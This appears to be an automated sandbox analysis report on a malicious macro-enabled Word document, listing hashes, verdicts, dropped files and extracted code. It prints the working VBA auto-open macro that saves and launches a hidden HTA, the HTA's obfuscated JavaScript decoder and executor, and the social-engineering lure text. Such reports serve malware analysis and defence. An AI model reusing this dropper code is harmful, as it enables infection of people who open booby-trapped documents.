Malicious

Classifications: -

Threat Names: Mal/Generic-S, Mal/HTMLGen-A, VB:Trojan.Valyria.5645

Remarks

(0x0200004A): 192 dumps were skipped because they exceeded the maximum dump size of 16 MB. The largest one was 19 MB.

File Name C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc
Category Sample File
Type Word Document
Verdict malicious
MIME Type application/vnd.ms-word.document.macroEnabled.12
File Size 34.00 KB
MD5 a9490d94cf547e27dcc0d52dc72e74e7
SHA1 a00e440eb13f84c8b8faba5b81a7d85fce2a4074
SHA256 ee103f8d64cd8fa884ff6a041db2f7aa403c502f54e26337c606044c2f205394
SSDeep 384:xS6JqYxSJTvfpHhx/gFj0EEYpcVhE1ltmTV/YZO4NSCWl822TnUCSdQQUfwliiid:ZJqY0phb4a02VWnZdw9822zAEhXd
ImpHash -
File Reputation Information
Verdict
malicious
AV Matches (2)
Threat Name Verdict
VB:Trojan.Valyria.5645 malicious
VB:Trojan.Valyria.5645 malicious
Office Information
Keywords ath.txeNwoPwop\cilbup\sresu\:c
Creator ozdgjmh
Last Modified By Пользователь Windows
Revision 2
Create Time 2021-11-10 09:34:00+00:00
Modify Time 2021-11-10 09:34:00+00:00
Application Microsoft Office Word
App Version 16.0000
Template Normal
Document Security NONE
Page Count 1
Line Count 42
Paragraph Count 1
Word Count 116
Character Count 9917
Chars With Spaces 10032
ScaleCrop False
SharedDoc False
VBA Macros (2)
Macro #1: ThisDocument
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function keywords()
With ActiveDocument
girlKarolGirl = .BuiltInDocumentProperties("keywords").Value
End With
keywords = StrReverse(girlKarolGirl)
ActiveDocument.Content.Find.Execute FindText:="$1", ReplaceWith:=dowKarolYou, Replace:=wdReplaceAll
End Function
Public Function s(dowGirlLoad)
Set dowYouKarol = CreateObject("wscript.shell")
dowYouKarol.exec "c:\windows\explorer " & dowGirlLoad
End Function
Sub document_open()
main.karoline ("")
End Sub
Macro #2: main
Attribute VB_Name = "main"
Public Sub karoline(likeTubeLike)
doorLikeDow = ThisDocument.keywords
With ActiveDocument
.SaveAs2 FileName:=doorLikeDow, FileFormat:=2
End With
ThisDocument.s doorLikeDow
End Sub
Document Content Snippet
Extracted Image Texts (1)
Image 1: image1.gif
This document created in previous version of Microsoft Office Word. To view or edit this document, please click “Enable editing” button on the top bar, and then click “Enable content”.
File Name vbaProject.bin
Category Embedded File
Type Unknown
Verdict malicious
Parent File C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc
MIME Type application/CDFV2
File Size 15.00 KB
MD5 71fa78284518876e61de2cb2b4433a98
SHA1 09f85eeb62089e1517b9066919e6004021d12c61
SHA256 647df13d43101abafb35742e5cdb0ceab3c140ea4c2235168debc16738c5f87d
SSDeep 192:Vdo0U83qTLpy+KN0j3i8ktfvyOvMEb6va:7dCp1KN0j3i8ktMEb6
ImpHash -
File Reputation Information
Verdict
malicious
Names Mal/Generic-S
AV Matches (1)
Threat Name Verdict
VB:Trojan.Valyria.5645 malicious
File Name c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\counters.dat
Category Modified File
Type Stream
Verdict clean
MIME Type application/octet-stream
File Size 128 Bytes
MD5 cc90851958032b8c8bbb7b24ec6271dd
SHA1 e027ad2ea4049374a3b01af2e3626b667dc816bc
SHA256 c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858
SSDeep 3:Fl:
ImpHash -
File Name image1.gif
Category Embedded File
Type Image
Verdict clean
Also Known As c:\users\rdhj0cnfevzx\appdata\local\microsoft\windows\inetcache\content.mso\cd5629ca.gif (Dropped File)
Parent File C:\Users\RDhJ0CNFevzX\Desktop\instruct_11.21.doc.vir.doc
MIME Type image/gif
File Size 13.99 KB
MD5 76da3e2154587dd3d69a81fcdb0c7364
SHA1 0f23e27b3a456b22a11d3fbc3132397b0ddc9357
SHA256 f9299ab3483a8f729b2aca2111b46e9952d4491ac66124fec22c1c789ebc3139
SSDeep 384:3j0EEYpcVhE1ltmTV/YZO4NSCWl822TnU0:w02VWnZdw9822zv
ImpHash -
File Name c:\users\public\~wrd0000.tmp
Category Dropped File
Type HTML
Verdict clean
Also Known As c:\users\public\powpownext.hta (Dropped File)
MIME Type text/html
File Size 3.27 KB
MD5 fa2b89027304712fb8366c1f6b4f2827
SHA1 6f851332c08998d25d839112a5c9d3ca8e57fcc0
SHA256 6e1338e07405a9b14db254b9769767ea824cf3ac1c8dfecb3513e95135eceaee
SSDeep 96:bGotzrVgMR61CQB7MGxag4hE8h9LU9fLtrlv:yCrVnuPMGByEkmp
ImpHash -
Extracted JavaScripts (4)
JavaScript #1
// Same script as extracted, reflowed from one minified line for readability; behaviour unchanged.
function likeTubeDoor(loveDowPow){return(new ActiveXObject(loveDowPow));}
// Reads the innerHTML of a DOM element by id (the HTA keeps its data in hidden <div>s).
function loadLoveLove(girlNextPow){return(loadDowDow.getElementById(girlNextPow).innerHTML);}
function tubeNextPow(likeLoadNext){return('cha' + likeLoadNext);}
// Custom base64 decoder; the alphabet is taken from the element with id 'karolPowYou'.
function dowYouLike(doorLoadDoor){
    var girlTubePow = loadLoveLove('karolPowYou');
    var likeDoorDoor = "";
    var youPowLoad, tubeGirlTube, girlLoadGirl;
    var karolKarolLoad, doorLikeKarol, dowDoorLove, nextNextYou;
    var youDoorKarol = 0;
    doorLoadDoor = doorLoadDoor.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    while(youDoorKarol < doorLoadDoor.length){
        karolKarolLoad = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        doorLikeKarol = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        dowDoorLove = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        nextNextYou = girlTubePow.indexOf(doorLoadDoor.charAt(youDoorKarol++));
        youPowLoad = (karolKarolLoad << 2) | (doorLikeKarol >> 4);
        tubeGirlTube = ((doorLikeKarol & 15) << 4) | (dowDoorLove >> 2);
        girlLoadGirl = ((dowDoorLove & 3) << 6) | nextNextYou;
        likeDoorDoor = likeDoorDoor + String.fromCharCode(youPowLoad);
        if(dowDoorLove != 64){likeDoorDoor = likeDoorDoor + String.fromCharCode(tubeGirlTube);}
        if(nextNextYou != 64){likeDoorDoor = likeDoorDoor + String.fromCharCode(girlLoadGirl);}
    }
    return(likeDoorDoor);
}
// String reversal.
function karolLoadNext(tubeTubeLove){return tubeTubeLove.split('').reverse().join('');}
// Decode step: reverse, base64-decode, reverse again.
function loveNextKarol(likeLoadNext){return(karolLoadNext(dowYouLike(karolLoadNext(likeLoadNext))));}
function karolNextDoor(likeLoadNext, nextNextLike){return(likeLoadNext.split(nextNextLike));}
doorPowLove = window;
loadDowDow = document;
// Moves the HTA window off-screen.
doorPowLove.moveTo(-10, -10);
// The element 'karolLikeDow' holds two encoded strings separated by "|||"; both are decoded here.
var tubeNextDow = loadLoveLove('karolLikeDow').split("|||");
var tubeNextDoor = loveNextKarol(tubeNextDow[0]);
var likeGirlTube = loveNextKarol(tubeNextDow[1]);
JavaScript #2
function tubeYouDow(tubeLoadLove){doorPowLove[karolLoadNext(loadLoveLove('youGirlYou'))](tubeLoadLove);}
JavaScript #3
Call tubeYouDow(tubeNextDoor) : Call tubeYouDow(likeGirlTube)
JavaScript #4
doorPowLove['close']();
File Name c:\users\public\~$wpownext.hta
Category Dropped File
Type Stream
Verdict clean
MIME Type application/octet-stream
File Size 162 Bytes
MD5 f80d2be1edfe197e672e9b7c7b73a067
SHA1 5f10137b84f50b95bdd438818fd1dbaa6506651c
SHA256 7dca88fac9a1cb53ec518cf3428448daf2dcdf349eddee8ebfb9793fdb99e3e4
SSDeep 3:fmrc9/XMflUflllXBJaeqvaplsltl:Orc9/8NUF7zqvaLslX
ImpHash -
File Name C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
Category Dropped File
Type Unknown
Verdict clean (known to be clean)
MIME Type application/x-dbt
File Size 47.97 KB
MD5 0392ada071eb68355bed625d8f9695f3
SHA1 777253141235b6c6ac92e17e297a1482e82252cc
SHA256 b1313dd95eaf63f33f86f72f09e2ecd700d11159a8693210c37470fcb84038f7
SSDeep 3:Ztt:T
ImpHash -
File Name C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\YPFIZL51\error[1]
Category Dropped File
Type HTML
Verdict clean (known to be clean)
MIME Type text/html
File Size 3.17 KB
MD5 16aa7c3bebf9c1b84c9ee07666e3207f
SHA1 bf0afa2f8066eb7ee98216d70a160a6b58ec4aa1
SHA256 7990e703ae060c241eba6257d963af2ecf9c6f3fbdb57264c1d48dda8171e754
SSDeep 96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
ImpHash -
Extracted JavaScripts (1)
JavaScript #1
var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";
var L_ErrorNumber_Text = "Error: ";
var L_ContinueScript_Message = "Do you want to debug the current page?";
var L_AffirmativeKeyCodeLowerCase_Number = 121;
var L_AffirmativeKeyCodeUpperCase_Number = 89;
var L_NegativeKeyCodeLowerCase_Number = 110;
var L_NegativeKeyCodeUpperCase_Number = 78;
File Name C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\0GQKFXIA\error[1]
Category Dropped File
Type Text
Verdict clean (known to be clean)
MIME Type text/plain
File Size 1.67 KB
MD5 b9bec45642ff7a2588dc6cb4131ea833
SHA1 4d150a53276c9b72457ae35320187a3c45f2f021
SHA256 b0abe318200dcde42e2125df1f0239ae1efa648c742dbf9a5b0d3397b903c21d
SSDeep 48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
ImpHash -
File Name C:\Users\RDhJ0CNFevzX\AppData\Local\Microsoft\Windows\INetCache\IE\VD7IA8JG\warning[1]
Category Dropped File
Type Image
Verdict clean
MIME Type image/gif
File Size 1.04 KB
MD5 124a9e7b6976f7570134b7034ee28d2b
SHA1 e889bfc2a2e57491016b05db966fc6297a174f55
SHA256 5f95eff2bcaaea82d0ae34a007de3595c0d830ac4810ea4854e6526e261108e9
SSDeep 12:z4ENetWsdvCMtkEFk+t2cd3ikIbOViGZVsMLfE4DMWUcC/GFvyVEZd6vcmadxVtS:nA/ag/QSi6/LKZzqKVQgJOexQkYfG6E
ImpHash -